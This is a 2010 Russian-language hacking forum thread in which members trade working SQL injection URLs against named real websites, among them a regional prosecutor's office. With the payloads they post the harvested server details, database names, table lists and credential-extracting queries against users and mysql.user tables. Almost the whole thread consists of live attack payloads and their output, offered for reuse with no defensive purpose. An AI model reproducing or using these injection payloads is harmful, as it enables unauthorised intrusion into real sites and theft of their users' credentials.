SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.spinter.net/page.php?id=-2+union+select+1,concat(user(),char(58),version(),char(58),database())
     
    _________________________
  2. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    75
    Likes Received:
    36
    Reputations:
    14
    Host IP: 83.223.101.10
    Web Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8b mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
    Powered-by: PHP/5.2.8
    DB Server: MySQL >=5
    Current DB: williamb_db



    Host IP: 87.106.251.143
    Web Server: Apache/2.2.3 (CentOS)
    Powered-by: PHP/5.1.6
    DB Server: MySQL >=5
    Current DB: costasales_csales


    Host IP: 209.188.112.4
    Web Server: Apache/2.2.3 (Red Hat)
    Powered-by: PHP/5.2.11
    DB Server: MySQL >=5
    Current DB: snakedancecondos

    Host IP: 64.150.165.92
    Web Server: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
    Powered-by: PHP/5.2.0-8+etch15
    DB Server: MySQL >=5
    Current DB: phpmy1_thereddstone_com

    Host IP: 217.77.176.23
    Web Server: Zeus/4.2
    Powered-by: PHP/4.4.2
    DB Server: MySQL
    Current DB: connexions-berkshire

    Host IP: 98.129.111.2
    Web Server: Apache/2.2.3 (Red Hat)
    Powered-by: PHP/5.2.13
    DB Server: MySQL >=5
    Current DB: brightworks_site


    хакИр :) :rolleyes: :cool:

    +++​
     
    #11962 KENT1994, 4 May 2010
    Last edited: 4 May 2010
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.novosarajevo.ba/stream/article.php?pid=-301+union+select+1,2,3,aes_decrypt(aes_encrypt(concat(user(),char(32,58,32),version(),char(32,58,32),database()),1),1),5,6,7,8,9,10,11,12,13,14,15,16,17,18--
     
    _________________________
  4. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    75
    Likes Received:
    36
    Reputations:
    14
    Host IP: 85.25.124.18
    Web Server: Apache/2.2.3 (CentOS)
    Powered-by: PHP/5.1.6

    DB Server: MySQL unknown ver
    Current DB: lasantha_col3neg

    Host IP: 69.41.197.19
    Web Server: Apache/2.2.3 (CentOS)
    Powered-by: PHP/5.1.6
    DB Server: MySQL >=5
    Current DB: rentals

    Host IP: 216.92.217.5
    Web Server: Apache/2.2.14
    Powered-by: PHP/5.2.11
    DB Server: MySQL >=5
    Current DB: kinnon_ccop

    Host IP: 74.55.84.245
    Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.2
    Powered-by: PHP/4.4.8
    DB Server: MySQL >=5
    Current DB: tiyanak_cmsorig

    Host IP: 209.197.125.227
    Web Server: Apache/2.2.15
    Powered-by: PHP/5.2.13
    DB Server: MySQL >=5
    Current DB: turkish2_tcp

    Host IP: 143.239.1.112
    Web Server: Apache/2.0.52 (Red Hat)
    Powered-by: PHP/4.3.9
    DB Server: MySQL >=4.1
    Current DB: cmrc

    Host IP: 77.222.40.36
    Web Server: Apache/1.3.37-lk.a (Unix) mod_defer/0.1.lk mod_python/2.7.11 Python/2.4.3 PHP/4.4.4 mod_dp/lk.0.4.4
    Powered-by: PHP/4.4.4
    DB Server: MySQL >=5
    Current DB: sochiinr

    Host IP: 66.147.249.135
    Web Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2 mod_auth_passthrough/2.1 FrontPage/5.0.2.2635
    Powered-by: PHP/5.2.11
    DB Server: MySQL unknown ver
    Current DB: starfir3_starfiredb

    Host IP: 143.239.1.112
    Web Server: Apache/2.0.52 (Red Hat)
    Powered-by: PHP/4.3.9
    DB Server: MySQL >=4.1
    Current DB: cmrc

    Host IP: 69.163.243.21
    Web Server: Apache
    Powered-by: PHP/5.2.13
    DB Server: MySQL >=5
    Current DB: 361641_startinggate
     
    #11964 KENT1994, 4 May 2010
    Last edited: 4 May 2010
  5. aka_zver

    aka_zver Elder - Старейшина

    Joined:
    17 Sep 2009
    Messages:
    471
    Likes Received:
    330
    Reputations:
    73
    Сайт: http://www.portalcoquimbo.cl
    ТИЦ: 10
    PR: 4
    Пример запроса:
    Code:
    http://www.portalcoquimbo.cl/index3.php?id=-826+union+select+1,concat_ws(0x0b,version(),database(),user(),@@version_compile_os),now(),group_concat(0x0b,table_name),5,6+from+information_schema.tables--+
    version - 5.0.90-community-log
    database - portalco_portal
    user - portalco_portal@localhost
    os - unknown-linux-gnu
    tables:

    Code:
    CHARACTER_SETS,   
    COLLATIONS,   
    COLLATION_CHARACTER_SET_APPLICABILITY,   
    COLUMNS,   
    COLUMN_PRIVILEGES,   
    KEY_COLUMN_USAGE,   
    PROFILING,   
    ROUTINES,   
    SCHEMATA,   
    SCHEMA_PRIVILEGES,   
    STATISTICS,   
    TABLES,   
    TABLE_CONSTRAINTS,   
    TABLE_PRIVILEGES,   
    TRIGGERS,   
    USER_PRIVILEGES,   
    VIEWS,   
    bandeja,   
    boletinu,   
    categories,   
    categories_description,   
    cities,   
    clasificados,   
    comentarios,   
    comentarios_corr,   
    configuration,   
    configuration_group,   
    contenido_pg_en,   
    contenido_pg_es,   
    corresponsal_web,   
    encuestas_campos,   
    encuestas_encuestas,   
    encuestas_respuestas,   
    foro_categorias,   
    foro_foros,   
    foro_respuestas,   
    foro_temas,   
    galeria,   
    galerias,   
    gente_online,   
    ibf_admin_logs,   
    ibf_admin_permission_keys,   
    ibf_admin_permission_rows,   
    ibf_admin_sessions,   
    ibf_announcements,   
    ibf_attachments,   
    ibf_attachments_type,   
    ibf_badwords,   
    ibf_banfilters,   
    ibf_bulk_mail,   
    ibf_cache_store,   
    ibf_cal_calendars,   
    ibf_cal_events,   
    ibf_calendar_events,   
    ibf_components,   
    ibf_conf_settings,   
    ibf_conf_settings_titles,   
    ibf_contacts,   
    ibf_custom_bbcode,   
    ibf_dnames_change,   
    ibf_email_logs,   
    ibf_emoticons,   
    ibf_faq,   
    ib
    columns:


    Code:
    CHARACTER_SET_NAME,   
    DEFAULT_COLLATE_NAME,   
    DESCRIPTION,   
    MAXLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    ID,   
    IS_DEFAULT,   
    IS_COMPILED,   
    SORTLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    ORDINAL_POSITION,   
    COLUMN_DEFAULT,   
    IS_NULLABLE,   
    DATA_TYPE,   
    CHARACTER_MAXIMUM_LENGTH,   
    CHARACTER_OCTET_LENGTH,   
    NUMERIC_PRECISION,   
    NUMERIC_SCALE,   
    CHARACTER_SET_NAME,   
    COLLATION_NAME,   
    COLUMN_TYPE,   
    COLUMN_KEY,   
    EXTRA,   
    PRIVILEGES,   
    COLUMN_COMMENT,   
    GRANTEE,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    PRIVILEGE_TYPE,   
    IS_GRANTABLE,   
    CONSTRAINT_CATALOG,   
    CONSTRAINT_SCHEMA,   
    CONSTRAINT_NAME,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    ORDINAL_POSITION,   
    POSITION_IN_UNIQUE_CONSTRAINT,
    REFERENCED_TABLE_SCHEMA,   
    REFERENCED_TABLE_NAME,   
    REFERENCED_COLUMN_NAME,   
    QUERY_ID,   
    SEQ,   
    STATE,   
    DURATION,   
    CPU_USER,   
    CPU_SYSTEM,   
    CONTEXT_VOLUNTARY,   
    CONTEXT_INVOLUNTARY,   
    BLOCK_OPS_IN,   
    BLOCK_OPS_OUT,   
    MESSAGES_SENT,   
    MESSAGES_RECEIVED,   
    PAGE_FAULTS_MAJOR,   
    PAGE_FAULTS_MINOR,   
    SWAPS,   
    SOURCE_FUNCTION,   
    SOURCE_FILE,   
    SO
     
    #11965 aka_zver, 4 May 2010
    Last edited: 6 May 2010
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://lifestyle.bosnia.ba/index.php?sta=3&pid=-13817+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
     
    _________________________
  7. KENT1994

    KENT1994 Elder - Старейшина

    Joined:
    25 Sep 2009
    Messages:
    75
    Likes Received:
    36
    Reputations:
    14
    Host IP: 199.108.163.173
    Web Server: Apache/2.2.3 (Red Hat)
    Powered-by: PHP/5.1.6
    DB Server: MySQL >=5 :p
    Current DB: ankenyalumni

    Host IP: 203.80.162.200
    Web Server: Microsoft-IIS/6.0
    Powered-by: ASP.NET
    Powered-by: PHP/5.2.6
    DB Server: MySQL >=4.1
    Current DB: rhinos

    Host IP: 98.129.111.26
    Web Server: Apache/2.2.3 (Red Hat)
    Powered-by: PHP/5.2.13
    DB Server: MySQL >=5
    Current DB: brightworks_site

    :p :p
     
  8. Financier

    Financier New Member

    Joined:
    12 Dec 2009
    Messages:
    5
    Likes Received:
    4
    Reputations:
    3
    Code:
    http://www.histonfc.co.uk/news.php?id=9999+union+select+1,2,3,4,5,6,7,8,version(),10,11+from+news--
    Code:
    http://www.ng2.co.uk/news.php?id=1&newsid=9999+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password,email)+from+users--
    Code:
    http://graysathletic.co.uk/news.php?id=9999+union+select+1,2,3,4,5,6,7,8,9,10,email+from+users/*
    Code:
    http://www.henleystandard.co.uk/news/news.php?id=99999+union+select+1,2,3,4,5,6,table_name,8,9,10,11+from+information_schema.tables+limit+17,1--
    adfeature_text adfeature_upsell archive archivemedia breaking_news
    comments displayads editorial editorschoice emails faceforradio hsotv
    jobs jobs_new lineage media notices schools schoolsnews sitsvac 
    Code:
    http://www.airdrie007seacadets.co.uk/news.php?id=999+union+select+1,concat_ws(0x3a,name,pass,email),3,4,5,6,7,8,9+from+users--
    Code:
    http://lpoolcomp.co.uk/news.php?id=999+union+select+1,2,3,4,concat_ws(0x3a,username,password,email),6,7,8,9,10+from+users+limit+1,1--
    Code:
    http://www.wrightinvestments.co.uk/news.php?id=999+union+select+1,2,3,table_name,5,6+from+information_schema.tables+limit+17,1--
    IP_LOG gen_sets sessions stoContact tblCommercialNews tblCommercialPages
    tblContacts tblDesign tblEngineeringPages tblFinancePages tblFinanceTestimonials tblGallery tblInvestNews tblInvestPages 
    tblLivingNews tblLivingPages tblLocationGallery tblMeta tblPDF tblPages blProperty tblSpec tblSpecGallery tblStoragePages tblStorageTestimonials tblSupplyPages tblTradePages tblTypes tblWri wlv_tblProperty wriContact
    Code:
    http://www.spygenius.co.uk/news.php?id=999+union+select+1,2,3,table_name,5,6,7+from+information_schema.tables+limit+17,1--
    advice alan_page audio_page gigs_page home_page links_page news_page photos_page press_page shop_page
    Code:
    http://www.prologisstafford.co.uk/news.php?id=18&newsid=999+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password,email)+from+users--
    Code:
    http://www.michaellaird.co.uk/michael-laird-news.php?id=7+union+select+1,2,3,4,5,6,table_name,8,9+from+information_schema.tables+limit+17,1--
    awardcategories awards categories clients homebanner news pages people
    photos portfolio press recruitment
    Code:
    http://www.beebeedevelopments.co.uk/news.php?id=9000019+union+select+1,2,3,4,5,6,table_name,8,9,10,11+from+information_schema.tables+limit+17,1--
    main pdf prop d spWebPartsSiteLog 
    Code:
    http://www.lichfields.co.uk/news.php?id=99999+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17+from+clients--
    Code:
    http://www.physicaljerks.co.uk/news.php?id=99999+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+28,1--
    GDN_Activity GDN_ActivityType GDN_Category GDN_Comment GDN_CommentWatch
    GDN_Conversation GDN_ConversationMessage GDN_Discussion GDN_Draft GDN_Invitation GDN_Message GDN_Permission GDN_Photo GDN_Role GDN_ThemeSetting
    GDN_User GDN_UserAuthentication GDN_UserConversation GDN_UserDiscussion GDN_UserRole LUM_Attachment LUM_Attachment LUM_Category LUM_CategoryBlock 
    LUM_CategoryRoleBlock LUM_Comment LUM_Discussion LUM_DiscussionUserWhisperFrom LUM_DiscussionUserWhisperTo LUM_IpHistory
    LUM_Notify LUM_Role LUM_Style LUM_User LUM_UserBookmark LUM_UserDiscussionWatc
    Code:
    http://www.bkbluebird.co.uk/news.php?id=9999+union+select+1,2,3,version(),5,6--
     
    #11968 Financier, 5 May 2010
    Last edited: 8 May 2010
    3 people like this.
  9. heretic1990

    heretic1990 Elder - Старейшина

    Joined:
    2 Jul 2008
    Messages:
    487
    Likes Received:
    182
    Reputations:
    5
    Code:
    http://www.oasis-gidro.ru/news.php?id=99+union+select+1,COLUMN_NAME,3,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6f617a69735f7573657273+LIMIT+1,3%20--
    [email protected]:u19255:5.0.67-log
     
  10. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    А ВОТ ПРОКУРАТУРА КУРСКОЙ ОБЛАСТИ...

    Code:
    http://www.prockurskobl.ru/text.php?id=-1690+and+1=2+union+select+1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x71),0x71),5,6+--
    version : 5.0.16-standard-log
    user : [email protected]
    database : ProsecutoryDB
    os : pc-linux-gnu
    Code:
    http://www.prockurskobl.ru/text.php?id=-1690+and+1=2+union+select+1,2,3,aes_decrypt(aes_encrypt(group_concat(login,0x3a,hash+SEPARATOR+0x0b),0x71),0x71),5,6+from+auth--
     
    1 person likes this.
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.basw-ngo-by.net/page.php?issue_id=-292+union+select+1,2,3,4--

    user(): BASWNGOBYNET@LOCALHOST
    version(): 5.0.51A-24+LENNY1-LOG
    database(): BASWNGOBYNET
    OS: DEBIAN-LINUX-GNU
     
    _________________________
  12. aka_zver

    aka_zver Elder - Старейшина

    Joined:
    17 Sep 2009
    Messages:
    471
    Likes Received:
    330
    Reputations:
    73
    Сайт: http://www.laktomir-nsk.ru
    ТИЦ: 10
    PR: 1
    Пример запроса:
    Code:
    http://www.laktomir-nsk.ru/index3.php?id=-23+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os)--+
    version - 5.0.90-community
    user - ipdenis_admin@localhost
    database - ipdenis_laktomir
    os - pc-linux-gnu
    tables:

    Code:
    CHARACTER_SETS,   
    COLLATIONS,   
    COLLATION_CHARACTER_SET_APPLICABILITY,   
    COLUMNS,   
    COLUMN_PRIVILEGES,   
    KEY_COLUMN_USAGE,   
    PROFILING,   
    ROUTINES,   
    SCHEMATA,   
    SCHEMA_PRIVILEGES,   
    STATISTICS,   
    TABLES,   
    TABLE_CONSTRAINTS,   
    TABLE_PRIVILEGES,   
    TRIGGERS,   
    USER_PRIVILEGES,   
    VIEWS,   
    cute_categories,   
    cute_comments,   
    cute_flood,   
    cute_ipban,   
    cute_news,   
    cute_story,   
    cute_users,   
    categg,   
    email,   
    files,   
    kapital_zed_admin_menu,   
    kapital_zed_articles,   
    kapital_zed_brotator,   
    kapital_zed_category,   
    kapital_zed_form,   
    kapital_zed_news,   
    kapital_zed_pages,   
    kapital_zed_redirect,   
    kapital_zed_site_menu,   
    kapital_zed_siteinfo,   
    kapital_zed_tplblock,   
    kapital_zed_tplmanager,   
    kapital_zed_users,   
    tovari,   
    zed_news,   
    zed_news2,   
    cute_categories,   
    cute_comments,   
    cute_flood,   
    cute_ipban,   
    cute_news,   
    cute_story,   
    cute_users,   
    files,   
    kapital_zed_admin_menu,   
    kapital_zed_articles,   
    kapital_zed_brotator,   
    kapital_zed_category,   
    kapital_zed_form,   
    kapital_zed_news,   
    kapital_zed_pages,   
    kapital_zed_redirect,   
    kapital_zed_site_menu,   
    kapital_zed_siteinfo,   
    kapital_zed_tplblock,   
    kapital_zed_tplman
    columns:

    Code:
    CHARACTER_SET_NAME,   
    DEFAULT_COLLATE_NAME,   
    DESCRIPTION,   
    MAXLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    ID,   
    IS_DEFAULT,   
    IS_COMPILED,   
    SORTLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    ORDINAL_POSITION,   
    COLUMN_DEFAULT,   
    IS_NULLABLE,   
    DATA_TYPE,   
    CHARACTER_MAXIMUM_LENGTH,   
    CHARACTER_OCTET_LENGTH,   
    NUMERIC_PRECISION,   
    NUMERIC_SCALE,   
    CHARACTER_SET_NAME,   
    COLLATION_NAME,   
    COLUMN_TYPE,   
    COLUMN_KEY,   
    EXTRA,   
    PRIVILEGES,   
    COLUMN_COMMENT,   
    GRANTEE,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    PRIVILEGE_TYPE,   
    IS_GRANTABLE,   
    CONSTRAINT_CATALOG,   
    CONSTRAINT_SCHEMA,   
    CONSTRAINT_NAME,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    ORDINAL_POSITION,   
    POSITION_IN_UNIQUE_CONSTRAINT,
    REFERENCED_TABLE_SCHEMA,   
    REFERENCED_TABLE_NAME,   
    REFERENCED_COLUMN_NAME,   
    QUERY_ID,   
    SEQ,   
    STATE,   
    DURATION,   
    CPU_USER,   
    CPU_SYSTEM,   
    CONTEXT_VOLUNTARY,   
    CONTEXT_INVOLUNTARY,   
    BLOCK_OPS_IN,   
    BLOCK_OPS_OUT,   
    MESSAGES_SENT,   
    MESSAGES_RECEIVED,   
    PAGE_FAULTS_MAJOR,   
    PAGE_FAULTS_MINOR,   
    SWAPS,   SOURCE_FUNCTION,   
    SOURCE_FILE,   
    SO
    =========================================
    Сайт: http://www.spectehsnab.ru
    ТИЦ: 0
    PR: 2
    Пример запроса:
    Code:
    http://www.spectehsnab.ru/index3.php?id=251+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(version(),+1,+63),+floor(rand(0)*2)))--+
    version - 5.0.38-Ubuntu_ubuntu-log
    user - apache@localhost
    database - spectehsnab
    os - pc-linux-gnu

    =========================================

    Сайт: http://www.tectoria.co.jp
    ТИЦ: 0
    PR: :confused:
    Пример запроса:
    Code:
    http://www.tectoria.co.jp/products/index3.php?id=1'+and+1=cast((SELECT+version()||chr(58)||current_user||chr(58)||current_database())+as+int)--&cnt=
    version - PostgreSQL 7.3.15 on i686-pc-linux-gnu, compiled by GCC 2.96
    user - s06010103
    database - products_DB
    os - pc-linux-gnu
     
    1 person likes this.
  13. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    MySQL 4.1.14-nt
    серв на винде
    http://www.naranjeros.com.mx/detalle-col.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(group_concat(0x3a,user,0x3a,password,0x3a,file_priv))),11,12+from+mysql.user+--
    резалт

    лоадим файл SAM
    в hex
     
    1 person likes this.
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.wbstraining.com/php/events/showevent.php?id=-157+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables
     
    _________________________
  15. aka_zver

    aka_zver Elder - Старейшина

    Joined:
    17 Sep 2009
    Messages:
    471
    Likes Received:
    330
    Reputations:
    73
    Сайт: http://www.cosmicus.nl
    ТИЦ: 10
    PR: 5
    Пример запроса:
    Code:
    http://www.cosmicus.nl/site/index3.php?id=-186+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,group_concat(0x0b,table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+information_schema.tables--+
    version - 5.0.24a-standard
    database - cmcuser@localhost
    user - cosmicus
    os - pc-linux-gnu
    tables:

    Code:
    CHARACTER_SETS,   
    COLLATIONS,   
    COLLATION_CHARACTER_SET_APPLICABILITY,   
    COLUMNS,   
    COLUMN_PRIVILEGES,   
    KEY_COLUMN_USAGE,   
    ROUTINES,   
    SCHEMATA,   
    SCHEMA_PRIVILEGES,   
    STATISTICS,   
    TABLES,   
    TABLE_CONSTRAINTS,   
    TABLE_PRIVILEGES,   
    TRIGGERS,   
    USER_PRIVILEGES,   
    VIEWS,   
    11_afdeling,   
    11_bestuur,   
    11_bestuur_controle,   
    22_cms,   
    23_cms_page,   
    24_projecten,   
    4images_categories,   
    4images_comments,   
    4images_groupaccess,   
    4images_groupmatch,   
    4images_groups,   
    4images_images,   
    4images_images_temp,   
    4images_lightboxes,   
    4images_postcards,   
    4images_sessions,   
    4images_sessionvars,   
    4images_settings,   
    4images_users,   
    4images_wordlist,   
    4images_wordmatch,   
    99_cms,   
    advertenties,   
    afdeling,   
    agenda,   
    agenda_type,   
    ap_poll,   
    ap_settings,   
    ap_theme,   
    ap_users,   
    ap_votes,   
    artikels,   
    auteurs,   
    bestuur,   
    bestuur_edit,   
    blad,   
    cmc_banner,   
    cmc_bannerclient,   
    cmc_bannerfinish,   
    cmc_categories,   
    cmc_components,   
    cmc_contact_details,   
    cmc_content,   
    cmc_content_frontpage,   
    cmc_content_rating,   
    cmc_core_acl_aro,   
    cmc_core_acl_aro_groups,   
    cmc_core_acl_aro_sections,   
    cmc_core_acl_groups_aro_map,   
    cmc_core_l
    columns:

    Code:
    CHARACTER_SET_NAME,   
    DEFAULT_COLLATE_NAME,   
    DESCRIPTION,   
    MAXLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    ID,   
    IS_DEFAULT,   
    IS_COMPILED,   
    SORTLEN,   
    COLLATION_NAME,   
    CHARACTER_SET_NAME,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    ORDINAL_POSITION,   
    COLUMN_DEFAULT,   
    IS_NULLABLE,   
    DATA_TYPE,   
    CHARACTER_MAXIMUM_LENGTH,   
    CHARACTER_OCTET_LENGTH,   
    NUMERIC_PRECISION,   
    NUMERIC_SCALE,   
    CHARACTER_SET_NAME,   
    COLLATION_NAME,   
    COLUMN_TYPE,   
    COLUMN_KEY,   
    EXTRA,   
    PRIVILEGES,   
    COLUMN_COMMENT,   
    GRANTEE,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    PRIVILEGE_TYPE,   
    IS_GRANTABLE,   
    CONSTRAINT_CATALOG,   
    CONSTRAINT_SCHEMA,   
    CONSTRAINT_NAME,   
    TABLE_CATALOG,   
    TABLE_SCHEMA,   
    TABLE_NAME,   
    COLUMN_NAME,   
    ORDINAL_POSITION,   
    POSITION_IN_UNIQUE_CONSTRAINT,
    REFERENCED_TABLE_SCHEMA,   
    REFERENCED_TABLE_NAME,   
    REFERENCED_COLUMN_NAME,   
    SPECIFIC_NAME,   
    ROUTINE_CATALOG,   
    ROUTINE_SCHEMA,   
    ROUTINE_NAME,   
    ROUTINE_TYPE,   
    DTD_IDENTIFIER,   
    ROUTINE_BODY,   
    ROUTINE_DEFINITION,   
    EXTERNAL_NAME,   
    EXTERNAL_LANGUAGE,   
    PARAMETER_STYLE,   
    IS_DETERMINISTIC,   
    SQL_DATA_ACCESS,   
    SQL_PATH,   
    SECURITY_TYP
    ==================================

    Сайт: http://www.film.ua
    ТИЦ: 50
    PR: 4
    Примеры запросов:
    Code:
    http://www.film.ua/production/index3.php?option=com_content&task=view&id=-1'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(version(),+1,+63),+floor(rand(0)*2)))--+    
    http://www.film.ua/production/index3.php?option=com_content&task=view&id=-1'+union+select+1,2--+
    Нужна рега ^^
    version - 5.0.84-log
    user - film2@localhost
    database - film2
    os - pc-linux-gnu
     
    #11975 aka_zver, 5 May 2010
    Last edited: 5 May 2010
  16. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    723
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://www.zideo.nl/index.php?option=com_content&id=-142+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29--
    User: root@localhost
    Version: 5.0.51a-community-nt-log
    Database: admin_zideo

    Google PR: 5

    Какойто касяк с админкой!
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    прямо к админу

    http://dyadem.it/media/pr.php?id=-34+union+select+1,2,3,4,concat(username,char(58),password)+from+calendar.users+limit+0,1--
     
    _________________________
  18. Iron47

    Iron47 Member

    Joined:
    23 May 2009
    Messages:
    0
    Likes Received:
    11
    Reputations:
    -2
    Code:
    http://www.ruslana.ua/en/press.php?ln=2&pr=1+and+1=0+union+select+concat%280x5b,0x4d,0x61, 0x63,0x68,0x69,0x6e,0x65,0x3a,0x20,@@version_compi le_machine,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b ,0x4f,0x53,0x20,0x3a,0x20,@@version_compile_os,0x2 0,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x44,0x4 2,0x20,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x3a,0x2 0,0x20,@@version,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x2 0,0x5b,0x20,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x2 0,0x43,0x6f,0x6d,0x6d,0x65,0x6e,0x74,0x3a,0x20,@@v ersion_comment,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20, 0x5b,0x20,0x53,0x79,0x73,0x74,0x65,0x6d,0x20,0x55, 0x73,0x65,0x72,0x3a,0x20,system_user%28%29,0x20,0x 5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x48,0x6f,0x 73,0x74,0x6e,0x61,0x6d,0x65,0x3a,0x20,@@hostname,0 x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x44,0 x61,0x74,0x61,0x44,0x69,0x72,0x3a,0x20,@@datadir,0 x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x42,0 x61,0x73,0x65,0x64,0x69,0x72,0x3a,0x20,@@basedir,0 x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x74,0 x6d,0x70,0x20,0x44,0x69,0x72,0x3a,0x20,@@tmpdir,0x 20,0x5d,0x20,0x2d2d,0x2d,0x20,0x5b,0x20,0x44,0x61, 0x74,0x61,0x62,0x61,0x73,0x65,0x3a,0x20,database%2 8%29,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20, 0x53,0x74,0x6f,0x72,0x61,0x67,0x65,0x20,0x45,0x6e, 0x67,0x69,0x6e,0x65,0x3a,0x20,@@storage_engine,0x2 0,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x5 1,0x4c,0x20,0x57,0x61,0x72,0x6e,0x69,0x6e,0x67,0x7 3,0x3a,0x20,@@sql_warnings,0x20,0x5d,0x20,0x2d,0x2 d,0x2d,0x20,0x5b,0x20,0x53,0x65,0x72,0x76,0x65,0x7 2,0x20,0x49,0x44,0x3a,0x20,@@server_id,0x20,0x5d,0 x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x4c,0x69,0x63,0 x65,0x6e,0x73,0x65,0x3a,0x20,@@license,0x20,0x5d,0 x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x65,0x63,0 x75,0x72,0x65,0x20,0x41,0x75,0x74,0x68,0x3a,0x20,@ @secure_auth,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x 5b,0x20,0x45,0x78,0x70,0x69,0x72,0x65,0x20,0x4c,0x 6f,0x67,0x73,0x20,0x44,0x61,0x79,0x73,0x3a,0x20,@@ expire_logs_days,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x2 0,0x5b,0x20,0x4c,0x6f,0x67,0x20,0x57,0x61,0x72,0x6 e,0x69,0x6e,0x67,0x73,0x3a,0x20,@@log_warnings,0x2 0,0x5d,0x20,0x20,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x2 0,0x53,0x79,0x73,0x74,0x65,0x6d,0x20,0x54,0x69,0x6 d,0x65,0x20,0x5a,0x6f,0x6e,0x65,0x3a,0x20,@@system _time_zone,0x5d,0x20,0x2d,0x2d,0x2d,0x2d,0x2d,0x20 ,0x5b,0x20,0x54,0x69,0x6d,0x65,0x20,0x5a,0x6f,0x6e 